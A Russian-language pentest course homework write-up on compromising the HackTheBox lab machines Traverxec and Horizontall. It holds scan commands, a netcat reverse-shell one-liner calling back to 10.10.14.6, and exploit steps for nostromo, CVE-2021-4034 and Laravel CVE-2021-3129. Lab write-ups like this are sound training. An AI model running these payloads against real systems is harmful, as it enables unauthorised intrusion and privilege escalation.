# CSRn-8_25.05.2022_Network Infrastructure Attacks (Advanced)
ДЗ-1.
Обязательная часть:
Зарегистрируйтесь на платформе HackTheBox, активируйте VIP-аккаунт и получите доступ (возможность выполнять произвольные команды в командной оболочке) к машине Traverxec c правами пользователя.
Ссылка на машину: https://app.hackthebox.eu/machines/217
Дополнительная часть:
Найдите способ повысить свои права до пользователя root
По результатам атаки необходимо подготовить отчет в произвольной форме, описывающий методы, примененные для энумерации и получения доступа.
Сканируем хост
>nmap -Pn -n -vvv -T4 -sS -sV --version-all -sC -O --open -oA full_scan_traverxec traverxec.htb

Исследуем веб-сервер
>whatweb -a 3 --log-brief=traverxec_whatweb.log http://traverxec.htb

Находим эксплойт для nostromo 1.9.6

Скачиваем и запускаем эксплойт который дает реверсшел.
Можем удаленно выполнять команды

---
## DZ-2:
Обязательная часть
1. Повысить привилегии на машине Horizontall до root через проброс порта через SSH-туннель и эксплуатацию RCE-уязвимости в Laravel.
2. Реализовать атаку с использованием вредоносного макроса при помощи модуля MSF exploit/multi/fileformat/office_word_macro.
Дополнительная часть
Получить доступ к удаленному рабочему столу в Endgame Xen с помощью фишинговой атаки(аналогично примеру с занятия), найти способ запустить meterpreter (или иной postexploitation framework) и повысить свои права до NT AUTHORITY\SYSTEM.
>python3 50239.py http://api-prod.horizontall.htb

на PayloadsAllTheThings берем нагрузку для интерактивного реверсшела Netcat BusyBox
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox

предварительно открываем порт
>nc -nlvp 1234
и загружаем полезную нагрузку
> rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 1234 >/tmp/f

получаем соединение на предварительно открытый порт

LinPEAS подсветил CVE-2021-4034
Передав через http север exploit получаем повышение привилегий до root

Второй способ повышения привелегий
>curl http://localhost:8000

через уязвимость в фреймворке Laravel v8.
Так как http сервер работает на localhost:8000 необходимо пробросить этот порт на kali. Пробрасывать порт будем штатными средствами ssh. Так как соединение по ssh c horizontall на kali на 22 порт фильтруется, то сервер ssh на kali поднимем на порту 2222.

На horizontal включаем Remote TCP forwarding
>ssh -R 9999:localhost:8000 10.10.14.6 -p 2222
На kali запускаем Exploit for CVE-2021-3129 на localhost:9999.
>php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id
> ./laravel-ignition-rce.py http://localhost:9999/ /tmp/exploit.phar
2. Реализовать атаку с использованием вредоносного макроса при помощи модуля MSF exploit/multi/fileformat/office_word_macro.

